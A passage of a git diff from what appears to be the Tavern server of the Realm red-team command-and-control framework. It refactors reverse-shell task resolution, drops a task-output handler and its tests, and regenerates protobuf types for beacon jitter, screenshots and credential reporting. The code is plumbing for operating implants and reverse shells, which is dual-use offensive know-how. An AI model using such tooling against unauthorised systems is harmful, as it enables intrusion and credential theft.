nil { - return nil, status.Errorf(codes.Internal, "failed to submit shell task result (id=%d): %v", req.ShellTaskOutput.Id, err) - } - - if req.ShellTaskOutput.Error != nil { - e := fmt.Sprintf("%s%s", t.Error, req.ShellTaskOutput.Error.Msg) - shellTaskErr = &e - } - - // Update ShellTask - update := t.Update(). - SetNillableExecStartedAt(execStartedAt). - SetOutput(fmt.Sprintf("%s%s", t.Output, req.ShellTaskOutput.Output)). - SetNillableExecFinishedAt(execFinishedAt) - - if shellTaskErr != nil { - update.SetError(*shellTaskErr) - } - - _, err = update.Save(ctx) - if err != nil { - return nil, status.Errorf(codes.Internal, "failed to save submitted shell task result (id=%d): %v", t.ID, err) - } - - return &c2pb.ReportTaskOutputResponse{}, nil - } - - // Validate Input for regular Task - if req.Output == nil || req.Output.Id == 0 { - return nil, status.Errorf(codes.InvalidArgument, "must provide task id") - } - - // Parse Input - var ( - execStartedAt *time.Time - execFinishedAt *time.Time - taskErr *string - ) - if req.Output.ExecStartedAt != nil { - timestamp := req.Output.ExecStartedAt.AsTime() - execStartedAt = ×tamp - } - if req.Output.ExecFinishedAt != nil { - timestamp := req.Output.ExecFinishedAt.AsTime() - execFinishedAt = ×tamp - } - - // Load Task - t, err := srv.graph.Task.Get(ctx, int(req.Output.Id)) - if ent.IsNotFound(err) { - return nil, status.Errorf(codes.NotFound, "no task found (id=%d): %v", req.Output.Id, err) - } - if err != nil { - return nil, status.Errorf(codes.Internal, "failed to submit task result (id=%d): %v", req.Output.Id, err) - } - - if req.Output.Error != nil { - e := fmt.Sprintf("%s%s", t.Error, req.Output.Error.Msg) - taskErr = &e - } - - // Update Task - _, err = t.Update(). - SetNillableExecStartedAt(execStartedAt). - SetOutput(fmt.Sprintf("%s%s", t.Output, req.Output.Output)). - SetNillableExecFinishedAt(execFinishedAt). - SetNillableError(taskErr). - Save(ctx) - if err != nil { - return nil, status.Errorf(codes.Internal, "failed to save submitted task result (id=%d): %v", t.ID, err) - } - - return &c2pb.ReportTaskOutputResponse{}, nil -} diff --git a/tavern/internal/c2/api_report_task_output_test.go b/tavern/internal/c2/api_report_task_output_test.go deleted file mode 100644 index 43a1e98a8..000000000 --- a/tavern/internal/c2/api_report_task_output_test.go +++ /dev/null @@ -1,166 +0,0 @@ -package c2_test - -import ( - "context" - "testing" - "time" - - "github.com/google/go-cmp/cmp" - "github.com/stretchr/testify/assert" - "github.com/stretchr/testify/require" - "google.golang.org/grpc/codes" - "google.golang.org/grpc/status" - "google.golang.org/protobuf/testing/protocmp" - "google.golang.org/protobuf/types/known/timestamppb" - "realm.pub/tavern/internal/c2/c2pb" - "realm.pub/tavern/internal/c2/c2test" - "realm.pub/tavern/internal/ent" -) - -func TestReportTaskOutput(t *testing.T) { - // Setup Dependencies - ctx := context.Background() - client, graph, close, token := c2test.New(t) - defer close() - - // Test Data - now := timestamppb.Now() - finishedAt := timestamppb.New(time.Now().UTC().Add(10 * time.Minute)) - existingBeacon := c2test.NewRandomBeacon(ctx, graph) - existingTasks := []*ent.Task{ - c2test.NewRandomAssignedTask(ctx, graph, existingBeacon.Identifier), - c2test.NewRandomAssignedTask(ctx, graph, existingBeacon.Identifier), - } - - // Test Cases - tests := []struct { - name string - req *c2pb.ReportTaskOutputRequest - wantResp *c2pb.ReportTaskOutputResponse - wantCode codes.Code - wantOutput string - wantError string - wantExecStartedAt *timestamppb.Timestamp - wantExecFinishedAt *timestamppb.Timestamp - }{ - { - name: "First_Output", - req: &c2pb.ReportTaskOutputRequest{ - Output: &c2pb.TaskOutput{ - Id: int64(existingTasks[0].ID), - Output: "TestOutput", - ExecStartedAt: now, - }, - }, - wantResp: &c2pb.ReportTaskOutputResponse{}, - wantCode: codes.OK, - wantOutput: "TestOutput", - wantExecStartedAt: now, - }, - { - name: "First_error", - req: &c2pb.ReportTaskOutputRequest{ - Output: &c2pb.TaskOutput{ - Id: int64(existingTasks[0].ID), - Output: "", - Error: &c2pb.TaskError{ - Msg: "hello error!", - }, - ExecStartedAt: now, - }, - }, - wantResp: &c2pb.ReportTaskOutputResponse{}, - wantCode: codes.OK, - wantOutput: "TestOutput", - wantError: "hello error!", - wantExecStartedAt: now, - }, - { - name: "Append_Output", - req: &c2pb.ReportTaskOutputRequest{ - Output: &c2pb.TaskOutput{ - Id: int64(existingTasks[0].ID), - Output: "_AppendedOutput", - Error: &c2pb.TaskError{ - Msg: "_AppendEror", - }, - }, - }, - wantResp: &c2pb.ReportTaskOutputResponse{}, - wantCode: codes.OK, - wantOutput: "TestOutput_AppendedOutput", - wantError: "hello error!_AppendEror", - wantExecStartedAt: now, - }, - { - name: "Exec_Finished", - req: &c2pb.ReportTaskOutputRequest{ - Output: &c2pb.TaskOutput{ - Id: int64(existingTasks[0].ID), - ExecFinishedAt: finishedAt, - }, - }, - wantResp: &c2pb.ReportTaskOutputResponse{}, - wantCode: codes.OK, - wantOutput: "TestOutput_AppendedOutput", - wantError: "hello error!_AppendEror", - wantExecStartedAt: now, - wantExecFinishedAt: finishedAt, - }, - { - name: "Not_Found", - req: &c2pb.ReportTaskOutputRequest{ - Output: &c2pb.TaskOutput{ - Id: 999888777666, - }, - }, - wantResp: nil, - wantCode: codes.NotFound, - }, - { - name: "Invalid_Argument", - req: &c2pb.ReportTaskOutputRequest{ - Output: &c2pb.TaskOutput{}, - }, - wantResp: nil, - wantCode: codes.InvalidArgument, - }, - } - - // Run Tests - for _, tc := range tests { - t.Run(tc.name, func(t *testing.T) { - // Callback - // Ensure JWT present in request context - if tc.req.Context == nil { - tc.req.Context = &c2pb.TaskContext{Jwt: token} - } else { - tc.req.Context.Jwt = token - } - - resp, err := client.ReportTaskOutput(ctx, tc.req) - - // Assert Response Code - require.Equal(t, tc.wantCode.String(), status.Code(err).String(), err) - if status.Code(err) != codes.OK { - // Do not continue if we expected error code - return - } - - // Assert Response - if diff := cmp.Diff(tc.wantResp, resp, protocmp.Transform()); diff != "" { - t.Errorf("invalid response (-want +got): %v", diff) - } - - // Load Task - - testTask, err := graph.Task.Get(ctx, int(tc.req.Output.Id)) - require.NoError(t, err) - - // Task Assertions - assert.Equal(t, tc.wantOutput, testTask.Output) - assert.Equal(t, tc.wantError, testTask.Error) - }) - } - -} diff --git a/tavern/internal/c2/api_reverse_shell.go b/tavern/internal/c2/api_reverse_shell.go index cdfb57b21..e66bbe17f 100644 --- a/tavern/internal/c2/api_reverse_shell.go +++ b/tavern/internal/c2/api_reverse_shell.go @@ -22,6 +22,48 @@ const ( keepAlivePingInterval = 5 * time.Second ) +func (srv *Server) resolveTaskFromReverseShell(ctx context.Context, msg *c2pb.ReverseShellRequest) (*ent.Task, error) { + if tc := msg.GetTaskContext(); tc != nil { + if err := srv.ValidateJWT(tc.GetJwt()); err != nil { + return nil, err + } + t, err := srv.graph.Task.Get(ctx, int(tc.GetTaskId())) + if err != nil { + if ent.IsNotFound(err) { + slog.ErrorContext(ctx, "reverse shell failed: associated task does not exist", "task_id", tc.GetTaskId(), "error", err) + return nil, status.Errorf(codes.NotFound, "task does not exist (task_id=%d)", tc.GetTaskId()) + } + slog.ErrorContext(ctx, "reverse shell failed: could not load associated task", "task_id", tc.GetTaskId(), "error", err) + return nil, status.Errorf(codes.Internal, "failed to load task ent (task_id=%d): %v", tc.GetTaskId(), err) + } + return t, nil + } + + if stc := msg.GetShellTaskContext(); stc != nil { + if err := srv.ValidateJWT(stc.GetJwt()); err != nil { + return nil, err + } + st, err := srv.graph.ShellTask.Get(ctx, int(stc.GetShellTaskId())) + if err != nil { + slog.ErrorContext(ctx, "reverse shell failed: could not load associated shell task", "shell_task_id", stc.GetShellTaskId(), "error", err) + return nil, status.Errorf(codes.Internal, "failed to load shell task ent (shell_task_id=%d): %v", stc.GetShellTaskId(), err) + } + s, err := st.QueryShell().Only(ctx) + if err != nil { + slog.ErrorContext(ctx, "reverse shell failed: could not load associated shell", "shell_task_id", stc.GetShellTaskId(), "error", err) + return nil, status.Errorf(codes.Internal, "failed to load shell ent (shell_task_id=%d): %v", stc.GetShellTaskId(), err) + } + t, err := s.QueryTask().Only(ctx) + if err != nil { + slog.ErrorContext(ctx, "reverse shell failed: could not load associated task from shell", "shell_id", s.ID, "error", err) + return nil, status.Errorf(codes.Internal, "failed to load task ent from shell (shell_id=%d): %v", s.ID, err) + } + return t, nil + } + + return nil, status.Errorf(codes.InvalidArgument, "missing context") +} + func (srv *Server) ReverseShell(gstream c2pb.C2_ReverseShellServer) error { // Setup Context ctx := gstream.Context() @@ -33,16 +75,12 @@ func (srv *Server) ReverseShell(gstream c2pb.C2_ReverseShellServer) error { } // Load Relevant Ents - taskID := registerMsg.GetContext().GetTaskId() - task, err := srv.graph.Task.Get(ctx, int(taskID)) + task, err := srv.resolveTaskFromReverseShell(ctx, registerMsg) if err != nil { - if ent.IsNotFound(err) { - slog.ErrorContext(ctx, "reverse shell failed: associated task does not exist", "task_id", taskID, "error", err) - return status.Errorf(codes.NotFound, "task does not exist (task_id=%d)", taskID) - } - slog.ErrorContext(ctx, "reverse shell failed: could not load associated task", "task_id", taskID, "error", err) - return status.Errorf(codes.Internal, "failed to load task ent (task_id=%d): %v", taskID, err) + return err } + + taskID := int64(task.ID) beacon, err := task.Beacon(ctx) if err != nil { slog.ErrorContext(ctx, "reverse shell failed: could not load associated beacon", "task_id", taskID, "error", err) diff --git a/tavern/internal/c2/c2pb/c2.pb.go b/tavern/internal/c2/c2pb/c2.pb.go index 5f0c6a308..8ae3166ba 100644 --- a/tavern/internal/c2/c2pb/c2.pb.go +++ b/tavern/internal/c2/c2pb/c2.pb.go @@ -1,7 +1,7 @@ // Code generated by protoc-gen-go. DO NOT EDIT. // versions: -// protoc-gen-go v1.36.11 -// protoc v4.25.1 +// protoc-gen-go v1.36.5 +// protoc v3.21.12 // source: c2.proto package c2pb @@ -24,6 +24,55 @@ const ( _ = protoimpl.EnforceVersion(protoimpl.MaxVersion - 20) ) +type ReportFileKind int32 + +const ( + ReportFileKind_REPORT_FILE_KIND_UNSPECIFIED ReportFileKind = 0 + ReportFileKind_REPORT_FILE_KIND_ONDISK ReportFileKind = 1 + ReportFileKind_REPORT_FILE_KIND_SCREENSHOT ReportFileKind = 2 +) + +// Enum value maps for ReportFileKind. +var ( + ReportFileKind_name = map[int32]string{ + 0: "REPORT_FILE_KIND_UNSPECIFIED", + 1: "REPORT_FILE_KIND_ONDISK", + 2: "REPORT_FILE_KIND_SCREENSHOT", + } + ReportFileKind_value = map[string]int32{ + "REPORT_FILE_KIND_UNSPECIFIED": 0, + "REPORT_FILE_KIND_ONDISK": 1, + "REPORT_FILE_KIND_SCREENSHOT": 2, + } +) + +func (x ReportFileKind) Enum() *ReportFileKind { + p := new(ReportFileKind) + *p = x + return p +} + +func (x ReportFileKind) String() string { + return protoimpl.X.EnumStringOf(x.Descriptor(), protoreflect.EnumNumber(x)) +} + +func (ReportFileKind) Descriptor() protoreflect.EnumDescriptor { + return file_c2_proto_enumTypes[0].Descriptor() +} + +func (ReportFileKind) Type() protoreflect.EnumType { + return &file_c2_proto_enumTypes[0] +} + +func (x ReportFileKind) Number() protoreflect.EnumNumber { + return protoreflect.EnumNumber(x) +} + +// Deprecated: Use ReportFileKind.Descriptor instead. +func (ReportFileKind) EnumDescriptor() ([]byte, []int) { + return file_c2_proto_rawDescGZIP(), []int{0} +} + type ReverseShellMessageKind int32 const ( @@ -57,11 +106,11 @@ func (x ReverseShellMessageKind) String() string { } func (ReverseShellMessageKind) Descriptor() protoreflect.EnumDescriptor { - return file_c2_proto_enumTypes[0].Descriptor() + return file_c2_proto_enumTypes[1].Descriptor() } func (ReverseShellMessageKind) Type() protoreflect.EnumType { - return &file_c2_proto_enumTypes[0] + return &file_c2_proto_enumTypes[1] } func (x ReverseShellMessageKind) Number() protoreflect.EnumNumber { @@ -70,7 +119,7 @@ func (x ReverseShellMessageKind) Number() protoreflect.EnumNumber { // Deprecated: Use ReverseShellMessageKind.Descriptor instead. func (ReverseShellMessageKind) EnumDescriptor() ([]byte, []int) { - return file_c2_proto_rawDescGZIP(), []int{0} + return file_c2_proto_rawDescGZIP(), []int{1} } type Transport_Type int32 @@ -109,11 +158,11 @@ func (x Transport_Type) String() string { } func (Transport_Type) Descriptor() protoreflect.EnumDescriptor { - return file_c2_proto_enumTypes[1].Descriptor() + return file_c2_proto_enumTypes[2].Descriptor() } func (Transport_Type) Type() protoreflect.EnumType { - return &file_c2_proto_enumTypes[1] + return &file_c2_proto_enumTypes[2] } func (x Transport_Type) Number() protoreflect.EnumNumber { @@ -164,11 +213,11 @@ func (x Host_Platform) String() string { } func (Host_Platform) Descriptor() protoreflect.EnumDescriptor { - return file_c2_proto_enumTypes[2].Descriptor() + return file_c2_proto_enumTypes[3].Descriptor() } func (Host_Platform) Type() protoreflect.EnumType { - return &file_c2_proto_enumTypes[2] + return &file_c2_proto_enumTypes[3] } func (x Host_Platform) Number() protoreflect.EnumNumber { @@ -231,6 +280,7 @@ type Transport struct { Interval uint64 `protobuf:"varint,2,opt,name=interval,proto3" json:"interval,omitempty"` Type Transport_Type `protobuf:"varint,3,opt,name=type,proto3,enum=c2.Transport_Type" json:"type,omitempty"` Extra string `protobuf:"bytes,4,opt,name=extra,proto3" json:"extra,omitempty"` + Jitter float32 `protobuf:"fixed32,5,opt,name=jitter,proto3" json:"jitter,omitempty"` unknownFields protoimpl.UnknownFields sizeCache protoimpl.SizeCache } @@ -293,6 +343,13 @@ func (x *Transport) GetExtra() string { return "" } +func (x *Transport) GetJitter() float32 { + if x != nil { + return x.Jitter + } + return 0 +} + type AvailableTransports struct { state protoimpl.MessageState `protogen:"open.v1"` Transports []*Transport `protobuf:"bytes,1,rep,name=transports,proto3" json:"transports,omitempty"` @@ -567,6 +624,7 @@ type ShellTask struct { ShellId int64 `protobuf:"varint,3,opt,name=shell_id,json=shellId,proto3" json:"shell_id,omitempty"` SequenceId uint64 `protobuf:"varint,4,opt,name=sequence_id,json=sequenceId,proto3" json:"sequence_id,omitempty"` StreamId string `protobuf:"bytes,5,opt,name=stream_id,json=streamId,proto3" json:"stream_id,omitempty"` + Jwt string `protobuf:"bytes,6,opt,name=jwt,proto3" json:"jwt,omitempty"` unknownFields protoimpl.UnknownFields sizeCache protoimpl.SizeCache } @@ -636,6 +694,13 @@ func (x *ShellTask) GetStreamId() string { return "" } +func (x *ShellTask) GetJwt() string { + if x != nil { + return x.Jwt + } + return "" +} + // TaskError provides information when task execution fails. type TaskError struct { state protoimpl.MessageState `protogen:"open.v1"` @@ -760,6 +825,50 @@ func (x *TaskOutput) GetExecFinishedAt() *timestamppb.Timestamp { return nil } +type ShellTaskError struct { + state protoimpl.MessageState `protogen:"open.v1"` + Msg string `protobuf:"bytes,1,opt,name=msg,proto3" json:"msg,omitempty"` + unknownFields protoimpl.UnknownFields + sizeCache protoimpl.SizeCache +} + +func (x *ShellTaskError) Reset() { + *x = ShellTaskError{} + mi := &file_c2_proto_msgTypes[9] + ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) + ms.StoreMessageInfo(mi) +} + +func (x *ShellTaskError) String() string { + return protoimpl.X.MessageStringOf(x) +} + +func (*ShellTaskError) ProtoMessage() {} + +func (x *ShellTaskError) ProtoReflect() protoreflect.Message { + mi := &file_c2_proto_msgTypes[9] + if x != nil { + ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) + if ms.LoadMessageInfo() == nil { + ms.StoreMessageInfo(mi) + } + return ms + } + return mi.MessageOf(x) +} + +// Deprecated: Use ShellTaskError.ProtoReflect.Descriptor instead. +func (*ShellTaskError) Descriptor() ([]byte, []int) { + return file_c2_proto_rawDescGZIP(), []int{9} +} + +func (x *ShellTaskError) GetMsg() string { + if x != nil { + return x.Msg + } + return "" +} + type ShellTaskOutput struct { state protoimpl.MessageState `protogen:"open.v1"` Id int64 `protobuf:"varint,1,opt,name=id,proto3" json:"id,omitempty"` @@ -775,7 +884,7 @@ type ShellTaskOutput struct { func (x *ShellTaskOutput) Reset() { *x = ShellTaskOutput{} - mi := &file_c2_proto_msgTypes[9] + mi := &file_c2_proto_msgTypes[10] ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) ms.StoreMessageInfo(mi) } @@ -787,7 +896,7 @@ func (x *ShellTaskOutput) String() string { func (*ShellTaskOutput) ProtoMessage() {} func (x *ShellTaskOutput) ProtoReflect() protoreflect.Message { - mi := &file_c2_proto_msgTypes[9] + mi := &file_c2_proto_msgTypes[10] if x != nil { ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) if ms.LoadMessageInfo() == nil { @@ -800,7 +909,7 @@ func (x *ShellTaskOutput) ProtoReflect() protoreflect.Message { // Deprecated: Use ShellTaskOutput.ProtoReflect.Descriptor instead. func (*ShellTaskOutput) Descriptor() ([]byte, []int) { - return file_c2_proto_rawDescGZIP(), []int{9} + return file_c2_proto_rawDescGZIP(), []int{10} } func (x *ShellTaskOutput) GetId() int64 { @@ -849,7 +958,7 @@ type TaskContext struct { func (x *TaskContext) Reset() { *x = TaskContext{} - mi := &file_c2_proto_msgTypes[10] + mi := &file_c2_proto_msgTypes[11] ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) ms.StoreMessageInfo(mi) } @@ -861,7 +970,7 @@ func (x *TaskContext) String() string { func (*TaskContext) ProtoMessage() {} func (x *TaskContext) ProtoReflect() protoreflect.Message { - mi := &file_c2_proto_msgTypes[10] + mi := &file_c2_proto_msgTypes[11] if x != nil { ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) if ms.LoadMessageInfo() == nil { @@ -874,7 +983,7 @@ func (x *TaskContext) ProtoReflect() protoreflect.Message { // Deprecated: Use TaskContext.ProtoReflect.Descriptor instead. func (*TaskContext) Descriptor() ([]byte, []int) { - return file_c2_proto_rawDescGZIP(), []int{10} + return file_c2_proto_rawDescGZIP(), []int{11} } func (x *TaskContext) GetTaskId() int64 { @@ -891,6 +1000,58 @@ func (x *TaskContext) GetJwt() string { return "" } +type ShellTaskContext struct { + state protoimpl.MessageState `protogen:"open.v1"` + ShellTaskId int64 `protobuf:"varint,1,opt,name=shell_task_id,json=shellTaskId,proto3" json:"shell_task_id,omitempty"` + Jwt string `protobuf:"bytes,2,opt,name=jwt,proto3" json:"jwt,omitempty"` + unknownFields protoimpl.UnknownFields + sizeCache protoimpl.SizeCache +} + +func (x *ShellTaskContext) Reset() { + *x = ShellTaskContext{} + mi := &file_c2_proto_msgTypes[12] + ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) + ms.StoreMessageInfo(mi) +} + +func (x *ShellTaskContext) String() string { + return protoimpl.X.MessageStringOf(x) +} + +func (*ShellTaskContext) ProtoMessage() {} + +func (x *ShellTaskContext) ProtoReflect() protoreflect.Message { + mi := &file_c2_proto_msgTypes[12] + if x != nil { + ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) + if ms.LoadMessageInfo() == nil { + ms.StoreMessageInfo(mi) + } + return ms + } + return mi.MessageOf(x) +} + +// Deprecated: Use ShellTaskContext.ProtoReflect.Descriptor instead. +func (*ShellTaskContext) Descriptor() ([]byte, []int) { + return file_c2_proto_rawDescGZIP(), []int{12} +} + +func (x *ShellTaskContext) GetShellTaskId() int64 { + if x != nil { + return x.ShellTaskId + } + return 0 +} + +func (x *ShellTaskContext) GetJwt() string { + if x != nil { + return x.Jwt + } + return "" +} + // RPC Messages type ClaimTasksRequest struct { state protoimpl.MessageState `protogen:"open.v1"` @@ -901,7 +1062,7 @@ type ClaimTasksRequest struct { func (x *ClaimTasksRequest) Reset() { *x = ClaimTasksRequest{} - mi := &file_c2_proto_msgTypes[11] + mi := &file_c2_proto_msgTypes[13] ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) ms.StoreMessageInfo(mi) } @@ -913,7 +1074,7 @@ func (x *ClaimTasksRequest) String() string { func (*ClaimTasksRequest) ProtoMessage() {} func (x *ClaimTasksRequest) ProtoReflect() protoreflect.Message { - mi := &file_c2_proto_msgTypes[11] + mi := &file_c2_proto_msgTypes[13] if x != nil { ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) if ms.LoadMessageInfo() == nil { @@ -926,7 +1087,7 @@ func (x *ClaimTasksRequest) ProtoReflect() protoreflect.Message { // Deprecated: Use ClaimTasksRequest.ProtoReflect.Descriptor instead. func (*ClaimTasksRequest) Descriptor() ([]byte, []int) { - return file_c2_proto_rawDescGZIP(), []int{11} + return file_c2_proto_rawDescGZIP(), []int{13} } func (x *ClaimTasksRequest) GetBeacon() *Beacon { @@ -946,7 +1107,7 @@ type ClaimTasksResponse struct { func (x *ClaimTasksResponse) Reset() { *x = ClaimTasksResponse{} - mi := &file_c2_proto_msgTypes[12] + mi := &file_c2_proto_msgTypes[14] ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) ms.StoreMessageInfo(mi) } @@ -958,7 +1119,7 @@ func (x *ClaimTasksResponse) String() string { func (*ClaimTasksResponse) ProtoMessage() {} func (x *ClaimTasksResponse) ProtoReflect() protoreflect.Message { - mi := &file_c2_proto_msgTypes[12] + mi := &file_c2_proto_msgTypes[14] if x != nil { ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) if ms.LoadMessageInfo() == nil { @@ -971,7 +1132,7 @@ func (x *ClaimTasksResponse) ProtoReflect() protoreflect.Message { // Deprecated: Use ClaimTasksResponse.ProtoReflect.Descriptor instead. func (*ClaimTasksResponse) Descriptor() ([]byte, []int) { - return file_c2_proto_rawDescGZIP(), []int{12} + return file_c2_proto_rawDescGZIP(), []int{14} } func (x *ClaimTasksResponse) GetTasks() []*Task { @@ -989,16 +1150,20 @@ func (x *ClaimTasksResponse) GetShellTasks() []*ShellTask { } type FetchAssetRequest struct { - state protoimpl.MessageState `protogen:"open.v1"` - Name string `protobuf:"bytes,1,opt,name=name,proto3" json:"name,omitempty"` - Context *TaskContext `protobuf:"bytes,2,opt,name=context,proto3" json:"context,omitempty"` + state protoimpl.MessageState `protogen:"open.v1"` + // Types that are valid to be assigned to Context: + // + // *FetchAssetRequest_TaskContext + // *FetchAssetRequest_ShellTaskContext + Context isFetchAssetRequest_Context `protobuf_oneof:"context"` + Name string `protobuf:"bytes,3,opt,name=name,proto3" json:"name,omitempty"` unknownFields protoimpl.UnknownFields sizeCache protoimpl.SizeCache } func (x *FetchAssetRequest) Reset() { *x = FetchAssetRequest{} - mi := &file_c2_proto_msgTypes[13] + mi := &file_c2_proto_msgTypes[15] ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) ms.StoreMessageInfo(mi) } @@ -1010,7 +1175,7 @@ func (x *FetchAssetRequest) String() string { func (*FetchAssetRequest) ProtoMessage() {} func (x *FetchAssetRequest) ProtoReflect() protoreflect.Message { - mi := &file_c2_proto_msgTypes[13] + mi := &file_c2_proto_msgTypes[15] if x != nil { ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) if ms.LoadMessageInfo() == nil { @@ -1023,23 +1188,57 @@ func (x *FetchAssetRequest) ProtoReflect() protoreflect.Message { // Deprecated: Use FetchAssetRequest.ProtoReflect.Descriptor instead. func (*FetchAssetRequest) Descriptor() ([]byte, []int) { - return file_c2_proto_rawDescGZIP(), []int{13} + return file_c2_proto_rawDescGZIP(), []int{15} } -func (x *FetchAssetRequest) GetName() string { +func (x *FetchAssetRequest) GetContext() isFetchAssetRequest_Context { if x != nil { - return x.Name + return x.Context } - return "" + return nil } -func (x *FetchAssetRequest) GetContext() *TaskContext { +func (x *FetchAssetRequest) GetTaskContext() *TaskContext { if x != nil { - return x.Context + if x, ok := x.Context.(*FetchAssetRequest_TaskContext); ok { + return x.TaskContext + } } return nil } +func (x *FetchAssetRequest) GetShellTaskContext() *ShellTaskContext { + if x != nil { + if x, ok := x.Context.(*FetchAssetRequest_ShellTaskContext); ok { + return x.ShellTaskContext + } + } + return nil +} + +func (x *FetchAssetRequest) GetName() string { + if x != nil { + return x.Name + } + return "" +} + +type isFetchAssetRequest_Context interface { + isFetchAssetRequest_Context() +} + +type FetchAssetRequest_TaskContext struct { + TaskContext *TaskContext `protobuf:"bytes,1,opt,name=task_context,json=taskContext,proto3,oneof"` +} + +type FetchAssetRequest_ShellTaskContext struct { + ShellTaskContext *ShellTaskContext `protobuf:"bytes,2,opt,name=shell_task_context,json=shellTaskContext,proto3,oneof"` +} + +func (*FetchAssetRequest_TaskContext) isFetchAssetRequest_Context() {} + +func (*FetchAssetRequest_ShellTaskContext) isFetchAssetRequest_Context() {} + type FetchAssetResponse struct { state protoimpl.MessageState `protogen:"open.v1"` Chunk []byte `protobuf:"bytes,1,opt,name=chunk,proto3" json:"chunk,omitempty"` @@ -1049,7 +1248,7 @@ type FetchAssetResponse struct { func (x *FetchAssetResponse) Reset() { *x = FetchAssetResponse{} - mi := &file_c2_proto_msgTypes[14] + mi := &file_c2_proto_msgTypes[16] ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) ms.StoreMessageInfo(mi) } @@ -1061,7 +1260,7 @@ func (x *FetchAssetResponse) String() string { func (*FetchAssetResponse) ProtoMessage() {} func (x *FetchAssetResponse) ProtoReflect() protoreflect.Message { - mi := &file_c2_proto_msgTypes[14] + mi := &file_c2_proto_msgTypes[16] if x != nil { ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) if ms.LoadMessageInfo() == nil { @@ -1074,7 +1273,7 @@ func (x *FetchAssetResponse) ProtoReflect() protoreflect.Message { // Deprecated: Use FetchAssetResponse.ProtoReflect.Descriptor instead. func (*FetchAssetResponse) Descriptor() ([]byte, []int) { - return file_c2_proto_rawDescGZIP(), []int{14} + return file_c2_proto_rawDescGZIP(), []int{16} } func (x *FetchAssetResponse) GetChunk() []byte { @@ -1085,16 +1284,20 @@ func (x *FetchAssetResponse) GetChunk() []byte { } type ReportCredentialRequest struct { - state protoimpl.MessageState `protogen:"open.v1"` - Context *TaskContext `protobuf:"bytes,1,opt,name=context,proto3" json:"context,omitempty"` - Credential *epb.Credential `protobuf:"bytes,2,opt,name=credential,proto3" json:"credential,omitempty"` + state protoimpl.MessageState `protogen:"open.v1"` + // Types that are valid to be assigned to Context: + // + // *ReportCredentialRequest_TaskContext + // *ReportCredentialRequest_ShellTaskContext + Context isReportCredentialRequest_Context `protobuf_oneof:"context"` + Credential *epb.Credential `protobuf:"bytes,3,opt,name=credential,proto3" json:"credential,omitempty"` unknownFields protoimpl.UnknownFields sizeCache protoimpl.SizeCache } func (x *ReportCredentialRequest) Reset() { *x = ReportCredentialRequest{} - mi := &file_c2_proto_msgTypes[15] + mi := &file_c2_proto_msgTypes[17] ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) ms.StoreMessageInfo(mi) } @@ -1106,7 +1309,7 @@ func (x *ReportCredentialRequest) String() string { func (*ReportCredentialRequest) ProtoMessage() {} func (x *ReportCredentialRequest) ProtoReflect() protoreflect.Message { - mi := &file_c2_proto_msgTypes[15] + mi := &file_c2_proto_msgTypes[17] if x != nil { ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) if ms.LoadMessageInfo() == nil { @@ -1119,16 +1322,34 @@ func (x *ReportCredentialRequest) ProtoReflect() protoreflect.Message { // Deprecated: Use ReportCredentialRequest.ProtoReflect.Descriptor instead. func (*ReportCredentialRequest) Descriptor() ([]byte, []int) { - return file_c2_proto_rawDescGZIP(), []int{15} + return file_c2_proto_rawDescGZIP(), []int{17} } -func (x *ReportCredentialRequest) GetContext() *TaskContext { +func (x *ReportCredentialRequest) GetContext() isReportCredentialRequest_Context { if x != nil { return x.Context } return nil } +func (x *ReportCredentialRequest) GetTaskContext() *TaskContext { + if x != nil { + if x, ok := x.Context.(*ReportCredentialRequest_TaskContext); ok { + return x.TaskContext + } + } + return nil +} + +func (x *ReportCredentialRequest) GetShellTaskContext() *ShellTaskContext { + if x != nil { + if x, ok := x.Context.(*ReportCredentialRequest_ShellTaskContext); ok { + return x.ShellTaskContext + } + } + return nil +} + func (x *ReportCredentialRequest) GetCredential() *epb.Credential { if x != nil { return x.Credential @@ -1136,6 +1357,22 @@ func (x *ReportCredentialRequest) GetCredential() *epb.Credential { return nil } +type isReportCredentialRequest_Context interface { + isReportCredentialRequest_Context() +} + +type ReportCredentialRequest_TaskContext struct { + TaskContext *TaskContext `protobuf:"bytes,1,opt,name=task_context,json=taskContext,proto3,oneof"` +} + +type ReportCredentialRequest_ShellTaskContext struct { + ShellTaskContext *ShellTaskContext `protobuf:"bytes,2,opt,name=shell_task_context,json=shellTaskContext,proto3,oneof"` +} + +func (*ReportCredentialRequest_TaskContext) isReportCredentialRequest_Context() {} + +func (*ReportCredentialRequest_ShellTaskContext) isReportCredentialRequest_Context() {} + type ReportCredentialResponse struct { state protoimpl.MessageState `protogen:"open.v1"` unknownFields protoimpl.UnknownFields @@ -1144,7 +1381,7 @@ type ReportCredentialResponse struct { func (x *ReportCredentialResponse) Reset() { *x = ReportCredentialResponse{} - mi := &file_c2_proto_msgTypes[16] + mi := &file_c2_proto_msgTypes[18] ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) ms.StoreMessageInfo(mi) } @@ -1156,7 +1393,7 @@ func (x *ReportCredentialResponse) String() string { func (*ReportCredentialResponse) ProtoMessage() {} func (x *ReportCredentialResponse) ProtoReflect() protoreflect.Message { - mi := &file_c2_proto_msgTypes[16] + mi := &file_c2_proto_msgTypes[18] if x != nil { ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) if ms.LoadMessageInfo() == nil { @@ -1169,20 +1406,25 @@ func (x *ReportCredentialResponse) ProtoReflect() protoreflect.Message { // Deprecated: Use ReportCredentialResponse.ProtoReflect.Descriptor instead. func (*ReportCredentialResponse) Descriptor() ([]byte, []int) { - return 